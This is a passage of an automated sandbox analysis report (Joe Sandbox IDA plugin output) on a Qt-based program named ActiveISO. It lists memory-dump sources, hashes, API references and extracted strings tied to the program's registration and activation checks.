                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@List$?begin@Url@@$?detach@?dispose@?end@Data@1@Data@1@@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 170659278-0
                                                                                                                  • Opcode ID: 600b4a65e85482da2189b2c9b1b7e617b73a579af7dd4cce050c1003a0177a36
                                                                                                                  • Instruction ID: 636ba5850267a4f7d9f1642754f645f80e5b74018622adb134bfbb1cb46f248a
                                                                                                                  • Opcode Fuzzy Hash: 600b4a65e85482da2189b2c9b1b7e617b73a579af7dd4cce050c1003a0177a36
                                                                                                                  • Instruction Fuzzy Hash: 3D11B221F19A1242F6509B66A88517D63A1FB49FA0B0C4130DE1EF3790DF3CE467874D
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@List$?begin@$?detach@?dispose@?end@Array@@ByteData@1@Data@1@@String@@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1357906528-0
                                                                                                                  • Opcode ID: 6ed1dcd632960c9fff05ba88a079e0fcb58e7ec3f2a88c7494ee826ff1d8dee6
                                                                                                                  • Instruction ID: eb60c5289ec9774818eb610e6fe9026d08ebe4d4b447dbb3ab74b0e9df70e494
                                                                                                                  • Opcode Fuzzy Hash: 6ed1dcd632960c9fff05ba88a079e0fcb58e7ec3f2a88c7494ee826ff1d8dee6
                                                                                                                  • Instruction Fuzzy Hash: 1011D032F1965242E6508B26A84216C6361FB49FA0B4C4130DE1EF3794CF2CD4638708
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@List$?begin@$?detach@?dispose@?end@Data@1@Data@1@@FileInfo@@Url@@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 758549299-0
                                                                                                                  • Opcode ID: 9b53dd726240cb28561b2bd5bbaf34af7d5e2a455f037dbe35f925dad47832df
                                                                                                                  • Instruction ID: 6a3b3fcbdd5f43eba36439bd89ff934d0357b9e19a55c1a1ffbc4ea90ba5f85b
                                                                                                                  • Opcode Fuzzy Hash: 9b53dd726240cb28561b2bd5bbaf34af7d5e2a455f037dbe35f925dad47832df
                                                                                                                  • Instruction Fuzzy Hash: A4119032F1961242FA509B66A841169A361FB49FA4B0C4130DE1EF3794DF2CD4A78708
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_DestroyStar$Heap$CloseFreeHandleProcessVolume
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2124161339-0
                                                                                                                  • Opcode ID: a00b89a9130143cb432597b1f07960f731c9c0a0d9a2513aead157c57b71a951
                                                                                                                  • Instruction ID: 0429fef4bc395ab515a70a331254562441f7564e7599639f3d08a1cc847b21f5
                                                                                                                  • Opcode Fuzzy Hash: a00b89a9130143cb432597b1f07960f731c9c0a0d9a2513aead157c57b71a951
                                                                                                                  • Instruction Fuzzy Hash: CA117C22E29A4282FB54DF61E44127863A6FF44F84F0C4034EA4DB7A49DF39D4518348
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653743C5F
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653743C86
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653743CAB
                                                                                                                  • ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653743CBE
                                                                                                                    • Part of subcall function 00007FF653746B90: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746BB8
                                                                                                                    • Part of subcall function 00007FF653746B90: ?fromString@QDate@@SA?AV1@AEBVQString@@0@Z.QT5CORE ref: 00007FF653746BCE
                                                                                                                    • Part of subcall function 00007FF653746B90: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746BDA
                                                                                                                    • Part of subcall function 00007FF653746B90: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746C0F
                                                                                                                    • Part of subcall function 00007FF653746B90: ?fromString@QDate@@SA?AV1@AEBVQString@@0@Z.QT5CORE ref: 00007FF653746C27
                                                                                                                    • Part of subcall function 00007FF653746B90: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746C38
                                                                                                                    • Part of subcall function 00007FF653746B90: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746C55
                                                                                                                    • Part of subcall function 00007FF653746B90: ?fromString@QDate@@SA?AV1@AEBVQString@@0@Z.QT5CORE ref: 00007FF653746C6D
                                                                                                                    • Part of subcall function 00007FF653746B90: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746C7E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?from$ArrayAscii_helper@Data@Typed$Date@@String@String@@0@$Settings@@
                                                                                                                  • String ID: Registered
                                                                                                                  • API String ID: 3362946526-77849264
                                                                                                                  • Opcode ID: 500fd77065a4c956de38867f93607ad063c6e61e2308e50f0a150d997545b74b
                                                                                                                  • Instruction ID: b35cc12a594098c0b2530f878581fd372c804ddd4e6c07da981aa48246c72486
                                                                                                                  • Opcode Fuzzy Hash: 500fd77065a4c956de38867f93607ad063c6e61e2308e50f0a150d997545b74b
                                                                                                                  • Instruction Fuzzy Hash: 6011A572E18B4691EB10CB50E4411A9B762FB84BA4F484232E59DA67F8DF3CE149C748
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer@@Widget@@$?count@?set?singleCurrentIndex@Object@@Object@@@Shot@malloc
                                                                                                                  • String ID: 1slotExit()
                                                                                                                  • API String ID: 664922978-2829603110
                                                                                                                  • Opcode ID: c36ac400c3cfa61e50adee0b7e676aae2414698acf9df5776ea1cec0a3326860
                                                                                                                  • Instruction ID: 9675ab40c0e302d7c05b5d0d7a06afb31d515fb7eca23a449fbee566002aca64
                                                                                                                  • Opcode Fuzzy Hash: c36ac400c3cfa61e50adee0b7e676aae2414698acf9df5776ea1cec0a3326860
                                                                                                                  • Instruction Fuzzy Hash: FC11CA21F2868192E744CBA2FA452B86363FF48F84F080035DB5D67765DF2CE0658749
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653743B87
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??0QSettings@@QEAA@AEBVQString@@W4Format@0@PEAVQObject@@@Z.QT5CORE ref: 00007FF653746CE1
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?setIniCodec@QSettings@@QEAAXPEBD@Z.QT5CORE ref: 00007FF653746CFC
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746D17
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653746D2A
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D36
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D4E
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653743BAE
                                                                                                                    • Part of subcall function 00007FF653746E00: ??0QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FF653746B3D), ref: 00007FF653746E2F
                                                                                                                    • Part of subcall function 00007FF653746E00: ?value@QSettings@@QEBA?AVQVariant@@AEBVQString@@AEBV2@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FF653746B3D), ref: 00007FF653746E44
                                                                                                                    • Part of subcall function 00007FF653746E00: ?toString@QVariant@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FF653746B3D), ref: 00007FF653746E51
                                                                                                                    • Part of subcall function 00007FF653746E00: ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FF653746B3D), ref: 00007FF653746E5D
                                                                                                                    • Part of subcall function 00007FF653746E00: ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FF653746B3D), ref: 00007FF653746E69
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653743BD1
                                                                                                                  • ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653743BDD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Settings@@Variant@@$?fromArrayAscii_helper@Data@Typed$?begin?set?value@Codec@Format@0@Group@Object@@@String@String@@@V2@@
                                                                                                                  • String ID: RegEmail
                                                                                                                  • API String ID: 3730470903-1580192543
                                                                                                                  • Opcode ID: 0a6aa82fc53706fffbc48c33cbb10bb965999b656cdda6f89d7e5637c6cc44c1
                                                                                                                  • Instruction ID: 5480e4297697c35feb9204c5f0fd2519dd96817bd0ecf78b06ec63378499827e
                                                                                                                  • Opcode Fuzzy Hash: 0a6aa82fc53706fffbc48c33cbb10bb965999b656cdda6f89d7e5637c6cc44c1
                                                                                                                  • Instruction Fuzzy Hash: 6A014421928A8192E700DB50F8461AAB761FBD4B70F484231E5DEA2AE8EF7CD549C744
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653743CFB
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??0QSettings@@QEAA@AEBVQString@@W4Format@0@PEAVQObject@@@Z.QT5CORE ref: 00007FF653746CE1
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?setIniCodec@QSettings@@QEAAXPEBD@Z.QT5CORE ref: 00007FF653746CFC
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746D17
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653746D2A
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D36
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D4E
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653743D22
                                                                                                                    • Part of subcall function 00007FF653746B00: ??0QDate@@QEAA@XZ.QT5CORE ref: 00007FF653746B27
                                                                                                                    • Part of subcall function 00007FF653746B00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746B66
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653743D45
                                                                                                                  • ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653743D51
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Settings@@$?fromArrayAscii_helper@Data@Typed$?begin?setCodec@Date@@Format@0@Group@Object@@@String@@@
                                                                                                                  • String ID: DemoRegistered
                                                                                                                  • API String ID: 1325145236-143322558
                                                                                                                  • Opcode ID: d58459e62de90f4e0a54cf6d841109d875d2e029978fd446afce718147127144
                                                                                                                  • Instruction ID: 38449464532fbb24fce5e9bffcfd8b85925de45504ab16e29d34650ad0d3c87d
                                                                                                                  • Opcode Fuzzy Hash: d58459e62de90f4e0a54cf6d841109d875d2e029978fd446afce718147127144
                                                                                                                  • Instruction Fuzzy Hash: 1DF03622A18A8192E710DB50F8460AAB722FBD4B70F484331E5AEA67F4DF7CD549C744
                                                                                                                  APIs
                                                                                                                  • ??0QThread@@QEAA@PEAVQObject@@@Z.QT5CORE(?,?,1loadItemToFileTreeFinished(QTreeWidgetItem*, int, int),00007FF6537221DC), ref: 00007FF65373128D
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(?,?,1loadItemToFileTreeFinished(QTreeWidgetItem*, int, int),00007FF6537221DC), ref: 00007FF6537312AD
                                                                                                                  • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE(?,?,1loadItemToFileTreeFinished(QTreeWidgetItem*, int, int),00007FF6537221DC), ref: 00007FF6537312B4
                                                                                                                  • ??0QFile@@QEAA@XZ.QT5CORE(?,?,1loadItemToFileTreeFinished(QTreeWidgetItem*, int, int),00007FF6537221DC), ref: 00007FF6537312C2
                                                                                                                  Strings
                                                                                                                  • 1loadItemToFileTreeFinished(QTreeWidgetItem*, int, int), xrefs: 00007FF653731285
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?sharedArrayData@@File@@Null@Object@@@String@@Thread@@
                                                                                                                  • String ID: 1loadItemToFileTreeFinished(QTreeWidgetItem*, int, int)
                                                                                                                  • API String ID: 338114790-1883380121
                                                                                                                  • Opcode ID: 79cbab464d9a039ffb042f04e8fb6e6df3c8b4b98006d260afe1a13a3a2e6cf2
                                                                                                                  • Instruction ID: 615e4cbcef9803c15d41b516b36fd097bbda5fb95f3e79127a3caae34a133af1
                                                                                                                  • Opcode Fuzzy Hash: 79cbab464d9a039ffb042f04e8fb6e6df3c8b4b98006d260afe1a13a3a2e6cf2
                                                                                                                  • Instruction Fuzzy Hash: 9DF0E232925B0196E7009FA5E88632933A5FB09F59F480131CA5DA2324DF3CD498C384
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?setString@@$?fromArrayAscii_helper@Data@Enabled@Label@@String@@@Text@TypedWidget@@
                                                                                                                  • String ID: Canceling...
                                                                                                                  • API String ID: 14344077-2577783926
                                                                                                                  • Opcode ID: 846161cceabd4169b4e99d7835fd17785eadc6c8609e999bcd07dd5deb6d0aef
                                                                                                                  • Instruction ID: 9843d02cc86ca908b0fa6c761ade724a086c05efe01a54aa4fbda812d23d223c
                                                                                                                  • Opcode Fuzzy Hash: 846161cceabd4169b4e99d7835fd17785eadc6c8609e999bcd07dd5deb6d0aef
                                                                                                                  • Instruction Fuzzy Hash: CCF03A22E38A06C2F7409B61E892A796322FF88F45F496131D90EB6A24DF2CD445C784
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?wizard@Page@@WizardWizard@@$?disconnect@D01@Object@@
                                                                                                                  • String ID: 1manualActivate()$2customButtonClicked(int)
                                                                                                                  • API String ID: 445512829-2015327854
                                                                                                                  • Opcode ID: 6c24c6c3d6c63382420406f1eae3171980f0b1d083e673bac2346772ae69a0dc
                                                                                                                  • Instruction ID: d3c02cd9498b2699af1e03b14f2025f2f0acacf3c23ae1955e27e9ba5e5bd6e2
                                                                                                                  • Opcode Fuzzy Hash: 6c24c6c3d6c63382420406f1eae3171980f0b1d083e673bac2346772ae69a0dc
                                                                                                                  • Instruction Fuzzy Hash: 9AE08690E3460781FB144B61EC665B513A2FF4AF80F5D6034CC0DBA320DD3C9096C784
                                                                                                                  APIs
                                                                                                                  • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF65376AB46), ref: 00007FF65376B31F
                                                                                                                  • CommandLineToArgvW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF65376AB46), ref: 00007FF65376B32D
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF65376AB46), ref: 00007FF65376B3E1
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF65376AB46), ref: 00007FF65376B412
                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF65376AB46), ref: 00007FF65376B455
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
